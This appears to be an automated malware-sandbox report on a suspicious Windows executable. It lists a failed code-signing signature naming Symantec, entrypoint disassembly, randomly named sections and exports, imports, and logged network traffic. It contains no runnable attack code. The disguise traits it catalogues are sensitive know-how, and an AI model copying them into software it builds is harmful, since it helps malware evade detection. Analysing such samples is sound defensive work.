Signature Issuer:	CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	10/31/2007 1:00:00 AM 11/25/2010 12:59:59 AM
Subject Chain	CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
Version:	3
Thumbprint MD5:	773A103A1953B292916AAA8D3382140B
Thumbprint SHA-1:	508E846523E1B131438B220694BE91793886508E
Thumbprint SHA-256:	F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
Serial:	758F5EE8263B6694719D8434EB998608

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 40h
push esi
push 00000000h
call dword ptr [004367ACh]
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-38h], eax
push FFFFFFFFh
push FFFFFFFFh
call dword ptr [00436738h]
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-08h], eax
push 0000001Bh
push dword ptr [0044CC4Ch]
push 0000005Bh
push 0000005Eh
push 0000000Ah
push dword ptr [0044CCD0h]
push 00000075h
push 00000016h
push 00000033h
call 00007F8448E1BB27h
lea ecx, dword ptr [0044CC4Ch]
mov dword ptr [0044CC88h], ecx
push 0044B3D0h
call dword ptr [00436860h]
mov dword ptr [0044CCD0h], eax
test eax, eax
je 00007F8448E17F39h
mov dword ptr [ebp-2Ch], eax
push 0044C8D4h
push 00437140h
push 0000005Ah
push 0044B81Ch
push 00000001h
call dword ptr [00436750h]
mov dword ptr [ebp-1Ch], eax
push 00000022h
push dword ptr [0044CC88h]
call 00007F8448E1C7BBh
mov eax, eax
sub eax, 05h
mov dword ptr [0044CC78h], eax
push 0044B4E8h
push 0044B7B8h
push 00000061h
push 0044C054h
push 00000001h
call dword ptr [0043670Ch]
jmp 00007F8448E1DE0Ah
inc dword ptr [ebp-48h]
add edi, dword ptr [ebp+18h]
mov dword ptr [0000BF5Ch], edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x8d5c	0x5d2
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36878	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x23db4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x46600	0x1570	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x76000	0xdf8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3670c	0x16c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7d84	0x7e00	False	0.553509424603	data	6.22201093313	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.scalma	0x9000	0x1f2	0x200	False	0.904296875	data	5.64374973739	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.submont	0xa000	0x5471	0x200	False	0.72265625	data	4.8373098102	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.enrive	0x10000	0x5543	0x400	False	0.5205078125	data	3.92071196367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.photopo	0x16000	0x551b	0x400	False	0.478515625	data	3.68373557762	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.circumz	0x1c000	0x5548	0x400	False	0.5166015625	data	3.98828405351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.cledoni	0x22000	0x5585	0x400	False	0.546875	data	4.16085889307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.anamorp	0x28000	0x27c	0x400	False	0.5302734375	data	4.0409895	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.ac	0x29000	0x20d	0x400	False	0.4619140625	, code offset 0x0+3, Bytes/sector 21760, sectors/cluster 15, reserved sectors 53431, FATs 104, root entries 1019, Media descriptor 0xff, sectors/FAT 20501, sectors/track 16496, FAT (12 bit by descriptor)	3.47420747402	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.zelania	0x2a000	0x5516	0x400	False	0.490234375	data	3.71276690203	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.accusat	0x30000	0x5587	0x400	False	0.5654296875	data	4.29306303539	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x36000	0x8f0	0xa00	False	0.42578125	data	4.67189250401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x37000	0x1afbb	0x15e00	False	0.63109375	data	5.22020830557	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x23db4	0x23e00	False	0.335610844948	data	5.18569235662	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x76000	0xdf8	0xe00	False	0.849051339286	data	6.78504743018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x53528	0x1628	dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 2559086728, next used block 1484812416	English	United States
RT_ICON	0x54b50	0x8a8	data	English	United States
RT_ICON	0x553f8	0x8a8	data	English	United States
RT_ICON	0x55ca0	0x8a8	data	English	United States
RT_ICON	0x56548	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x56ab0	0x8a8	data	English	United States
RT_ICON	0x57358	0xea8	data	English	United States
RT_ICON	0x58200	0x1628	dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 3520780239, next used block 702208062	English	United States
RT_ICON	0x59828	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1820116711, next used block 7376758	English	United States
RT_ICON	0x59b10	0x1e8	data	English	United States
RT_ICON	0x59cf8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x59e20	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15462911, next used block 15987701	English	United States
RT_ICON	0x5a6c8	0x6c8	data	English	United States
RT_ICON	0x5ad90	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x5b2f8	0x10a8	data	English	United States
RT_ICON	0x5c3a0	0x988	data	English	United States
RT_ICON	0x5cd28	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x5d190	0x8a8	data	English	United States
RT_ICON	0x5da38	0x8a8	data	English	United States
RT_ICON	0x5e2e0	0x8a8	data	English	United States
RT_ICON	0x5eb88	0x8a8	data	English	United States
RT_ICON	0x5f430	0x8a8	data	English	United States
RT_ICON	0x5fcd8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x5fe00	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x60368	0x2e8	data	English	United States
RT_ICON	0x60650	0x8a8	data	English	United States
RT_ICON	0x60ef8	0x668	dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 4290903295, next used block 4294967295	English	United States
RT_ICON	0x61560	0xea8	data	English	United States
RT_ICON	0x62408	0xfe0	data	English	United States
RT_ICON	0x633e8	0x8a8	data	English	United States
RT_ICON	0x63c90	0x8c0	data	English	United States
RT_ICON	0x64550	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16776176, next used block 10526884	English	United States
RT_ICON	0x64df8	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x65360	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 28723, next used block 0	English	United States
RT_ICON	0x65648	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x65770	0x8a8	data	English	United States
RT_ICON	0x66018	0xc7c	data	English	United States
RT_ICON	0x66c94	0x2e8	data	English	United States
RT_ICON	0x66f7c	0x8a8	data	English	United States
RT_ICON	0x67824	0x8a8	data	English	United States
RT_ICON	0x680cc	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16776176, next used block 10526884	English	United States
RT_ICON	0x68974	0x8a8	data	English	United States
RT_ICON	0x6921c	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x69344	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x698ac	0x2e8	data	English	United States
RT_ICON	0x69b94	0x8a8	data	English	United States
RT_ICON	0x6a43c	0x668	dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 4294967295	English	United States
RT_ICON	0x6aaa4	0xea8	data	English	United States
RT_ICON	0x6b94c	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x6bdb4	0x988	data	English	United States
RT_ICON	0x6c73c	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x6d7e4	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x6fd8c	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x73fb4	0x8a8	data	English	United States
RT_ICON	0x7485c	0xea8	data	English	United States
RT_GROUP_ICON	0x75704	0x14	data	English	United States
RT_GROUP_ICON	0x75718	0x14	data	English	United States
RT_GROUP_ICON	0x7572c	0x14	data	English	United States
RT_GROUP_ICON	0x75740	0x14	data	English	United States
RT_GROUP_ICON	0x75754	0x14	data	English	United States
RT_GROUP_ICON	0x75768	0x14	data	English	United States
RT_GROUP_ICON	0x7577c	0x14	data	English	United States
RT_GROUP_ICON	0x75790	0x14	data	English	United States
RT_GROUP_ICON	0x757a4	0x14	data	English	United States
RT_GROUP_ICON	0x757b8	0x14	data	English	United States
RT_GROUP_ICON	0x757cc	0x14	data	English	United States
RT_GROUP_ICON	0x757e0	0x14	data	English	United States
RT_GROUP_ICON	0x757f4	0x14	data	English	United States
RT_GROUP_ICON	0x75808	0x14	data	English	United States
RT_GROUP_ICON	0x7581c	0x14	data	English	United States
RT_GROUP_ICON	0x75830	0x14	data	English	United States
RT_GROUP_ICON	0x75844	0x14	data	English	United States
RT_GROUP_ICON	0x75858	0x14	data	English	United States
RT_GROUP_ICON	0x7586c	0x14	data	English	United States
RT_GROUP_ICON	0x75880	0x14	data	English	United States
RT_GROUP_ICON	0x75894	0x14	data	English	United States
RT_GROUP_ICON	0x758a8	0x14	data	English	United States
RT_GROUP_ICON	0x758bc	0x14	data	English	United States
RT_GROUP_ICON	0x758d0	0x14	data	English	United States
RT_GROUP_ICON	0x758e4	0x14	data	English	United States
RT_GROUP_ICON	0x758f8	0x14	data	English	United States
RT_GROUP_ICON	0x7590c	0x14	data	English	United States
RT_GROUP_ICON	0x75920	0x14	data	English	United States
RT_GROUP_ICON	0x75934	0x14	data	English	United States
RT_GROUP_ICON	0x75948	0x14	data	English	United States
RT_GROUP_ICON	0x7595c	0x14	data	English	United States
RT_GROUP_ICON	0x75970	0x14	data	English	United States
RT_GROUP_ICON	0x75984	0x14	data	English	United States
RT_GROUP_ICON	0x75998	0x14	data	English	United States
RT_GROUP_ICON	0x759ac	0x14	data	English	United States
RT_GROUP_ICON	0x759c0	0x14	data	English	United States
RT_GROUP_ICON	0x759d4	0x14	data	English	United States
RT_GROUP_ICON	0x759e8	0x14	data	English	United States
RT_GROUP_ICON	0x759fc	0x14	data	English	United States
RT_GROUP_ICON	0x75a10	0x14	data	English	United States
RT_GROUP_ICON	0x75a24	0x14	data	English	United States
RT_GROUP_ICON	0x75a38	0x14	data	English	United States
RT_GROUP_ICON	0x75a4c	0x14	data	English	United States
RT_GROUP_ICON	0x75a60	0x14	data	English	United States
RT_GROUP_ICON	0x75a74	0x14	data	English	United States
RT_GROUP_ICON	0x75a88	0x14	data	English	United States
RT_GROUP_ICON	0x75a9c	0x14	data	English	United States
RT_GROUP_ICON	0x75ab0	0x14	data	English	United States
RT_GROUP_ICON	0x75ac4	0x14	data	English	United States
RT_GROUP_ICON	0x75ad8	0x14	data	English	United States
RT_GROUP_ICON	0x75aec	0x14	data	English	United States
RT_GROUP_ICON	0x75b00	0x14	data	English	United States
RT_GROUP_ICON	0x75b14	0x14	data	English	United States
RT_GROUP_ICON	0x75b28	0x14	data	English	United States
RT_GROUP_ICON	0x75b3c	0x14	data	English	United States
RT_VERSION	0x75b50	0x264	data	English	United States

Imports

DLL	Import
kernel32.dll	WriteConsoleW, SetUnhandledExceptionFilter, lstrcatW, SetConsoleCursorPosition, lstrcpyW, GetCurrentProcess, UnhandledExceptionFilter, VirtualProtect, QueryPerformanceCounter, lstrcmpiW, VerifyVersionInfoW, LocalAlloc, FormatMessageW, FileTimeToSystemTime, GetConsoleMode, SetConsoleMode, lstrcpynW, ReadConsoleW, GetProcAddress, VerSetConditionMask, GetComputerNameExW, MultiByteToWideChar, TerminateProcess, GetStdHandle, GetTimeFormatW, ReadFile, LoadLibraryW, FreeLibrary, GetCurrentProcessId, GetCurrentThreadId, GetLastError, lstrlenW, InterlockedIncrement, SetLastError, LocalFree, GetConsoleScreenBufferInfo, WideCharToMultiByte, GetTickCount, lstrcmpW, InterlockedDecrement, GetModuleHandleA
msvcrt.dll	_cexit, wcsncmp, _CxxThrowException, __winitenv, wcschr, free, wcstol, fflush, wcscpy, __wgetmainargs, _itow, _controlfp, wcstod, ?terminate@@YAXXZ, realloc, calloc, wcslen, _c_exit, _XcptFilter, wcsstr, _wcsicmp, __CxxFrameHandler, strtok, _iob, _wcsnicmp, _exit, _exit, fprintf, exit, memmove, wcstok, __set_app_type, __setusermatherr
ole32.dll	CoCreateInstance, CoTaskMemAlloc, CoInitializeSecurity, CoTaskMemFree, CoUninitialize, CoInitializeEx
secur32.dll	GetUserNameExW
user32.dll	CharUpperW, SetWindowLongW, LoadStringW, wsprintfW, CreateDialogParamW

Exports

Name	Ordinal	Address
Superperson	1	0x4010f0
Aleconner	2	0x4013ef
Gellert	3	0x401514
Thwacker	4	0x401602
Uroplania	5	0x4016a7
Benefactory	6	0x4018da
Pinchcrust	7	0x4019bc
Crippledom	8	0x401b9d
Bedcase	9	0x401c9f
Unenquired	10	0x401e3f
Echoism	11	0x40200b
Acinus	12	0x4021ab
Speculativeness	13	0x4024f5
Coverless	14	0x402725
Oillessness	15	0x402824
Racker	16	0x4028dd
Absinthiate	17	0x40294c
Untomb	18	0x402a28
Perichord	19	0x402b1d
Rhinology	20	0x402b8f
Boopis	21	0x402c16
Galerus	22	0x402c43
DllRegisterServer	23	0x402d74
Regovern	24	0x402f73
Candor	25	0x403478
Coracoradialis	26	0x40353f
Proexposure	27	0x403963
Inhumanely	28	0x403aa6
Thermometrical	29	0x403bdf
Plumist	30	0x403f41
Plexodont	31	0x40401b
Unthrushlike	32	0x404128
Proexercise	33	0x404220
Archswindler	34	0x4043ae
Locanda	35	0x404698
Ologistic	36	0x404714
Educationalism	37	0x4047d0
Ceryl	38	0x404c12
Suber	39	0x404c93
Dermoskeletal	40	0x404e1c
Splatter	41	0x404f1d
Lactamide	42	0x4051fc
Megapodiidae	43	0x40533e
Plutarchic	44	0x4055a3
Archimedean	45	0x40562d
Unsatiableness	46	0x40580e
Cartilagines	47	0x405925
Remilitarize	48	0x405aec
Unfiring	49	0x405c75
Hyphenism	50	0x405d0a
Tinworking	51	0x405e88
Rab	52	0x405f2d
Nipponium	53	0x406023
Nudibranchia	54	0x40614d
Dignified	55	0x4062ef
Focaloid	56	0x4063c3
Inefficacious	57	0x4064a2
Polyphylesis	58	0x406553
Araliophyllum	59	0x40682c
Shipment	60	0x406940
Pachydermatous	61	0x4069d2
Seminium	62	0x406b2f
Diapase	63	0x406c59
Hourful	64	0x406d24
Digamy	65	0x4070c7
Worlded	66	0x407316
Spoiling	67	0x407386
Shillingsworth	68	0x4074ac
Arbela	69	0x407832
Inharmoniously	70	0x407a06
DllUnregisterServer	71	0x407bc7

Version Infos

Description	Data
InternalName	Splenoceratosis
FileVersion	6, 7, 1, 7
CompanyName	PROMt
PrivateBuild	Unmurmurous
LegalTrademarks	Unchainable
Comments	Macromyelon
FileDescription	Amapondo
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2021 08:00:03.732979059 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.733747005 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.779865026 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.780045986 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.780316114 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.780416012 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.787930012 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.793018103 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.834573030 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.835966110 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.836007118 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.836039066 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.836044073 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.836074114 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.836095095 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.839914083 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.841166019 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.841209888 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.841238022 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.841252089 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.841290951 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.841295004 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.844515085 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.844579935 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.845094919 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.845177889 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.845271111 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.891211033 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891246080 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891274929 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891304016 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891344070 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.891374111 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.891750097 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891777992 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891805887 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891839981 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.891868114 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.892195940 CET	49764	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.892786026 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.892880917 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.893179893 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.893253088 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.894135952 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.913009882 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.913045883 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.913110018 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.913156986 CET	49763	443	192.168.2.4	104.20.185.68
Feb 10, 2021 08:00:03.940924883 CET	443	49763	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:03.979598999 CET	443	49764	104.20.185.68	192.168.2.4
Feb 10, 2021 08:00:04.969393969 CET	49767	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:04.972533941 CET	49769	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:04.972560883 CET	49768	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:04.972655058 CET	49770	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:04.972688913 CET	49771	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:04.972758055 CET	49772	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.013483047 CET	443	49767	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.013587952 CET	49767	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.014275074 CET	49767	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.016017914 CET	443	49769	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.016057968 CET	443	49768	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.016083956 CET	443	49771	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.016119003 CET	443	49772	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.016149044 CET	443	49770	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.016170025 CET	49771	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.016175032 CET	49769	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.016175032 CET	49768	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.016223907 CET	49772	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.016230106 CET	49770	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.020301104 CET	49770	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.020643950 CET	49768	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.021291018 CET	49771	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.021415949 CET	49772	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.021445036 CET	49769	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.057657957 CET	443	49767	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.058825016 CET	443	49767	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.058871031 CET	443	49767	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.058921099 CET	443	49767	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.058934927 CET	49767	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.058952093 CET	49767	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.058979988 CET	49767	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.063642025 CET	443	49770	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.063883066 CET	443	49768	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064568996 CET	443	49771	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064613104 CET	443	49772	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064680099 CET	443	49770	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064722061 CET	443	49770	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064755917 CET	443	49770	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064793110 CET	443	49769	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064801931 CET	49770	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.064842939 CET	49770	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.064851046 CET	49770	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.064956903 CET	443	49768	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.064996004 CET	443	49768	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.065037966 CET	443	49768	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.065093040 CET	49768	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.065146923 CET	49768	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.065154076 CET	49768	443	192.168.2.4	151.101.1.44
Feb 10, 2021 08:00:05.065610886 CET	443	49772	151.101.1.44	192.168.2.4
Feb 10, 2021 08:00:05.065665007 CET	443	49772	151.101.1.44	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2021 07:59:52.813853979 CET	49910	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:52.865179062 CET	53	49910	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:53.768256903 CET	55854	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:53.820095062 CET	53	55854	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:54.895735025 CET	64549	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:54.947385073 CET	53	64549	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:56.348741055 CET	63153	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:56.405731916 CET	53	63153	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:57.522456884 CET	52991	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:57.571600914 CET	53	52991	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:58.182564020 CET	53700	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:58.246678114 CET	53	53700	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:58.517858028 CET	51726	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:58.578073978 CET	53	51726	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:59.161664009 CET	56794	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:59.219110966 CET	53	56794	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:59.411058903 CET	56534	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:59.459939957 CET	53	56534	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:59.877295017 CET	56627	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:59.886950970 CET	56621	53	192.168.2.4	8.8.8.8
Feb 10, 2021 07:59:59.929183960 CET	53	56627	8.8.8.8	192.168.2.4
Feb 10, 2021 07:59:59.945417881 CET	53	56621	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:00.235522985 CET	63116	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:00.284308910 CET	53	63116	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:01.611608028 CET	64078	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:01.682307959 CET	53	64078	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:01.710906982 CET	64801	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:01.759725094 CET	53	64801	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:01.877788067 CET	61721	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:01.949915886 CET	53	61721	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:02.543351889 CET	51255	53	192.168.2.4	8.8.8.8
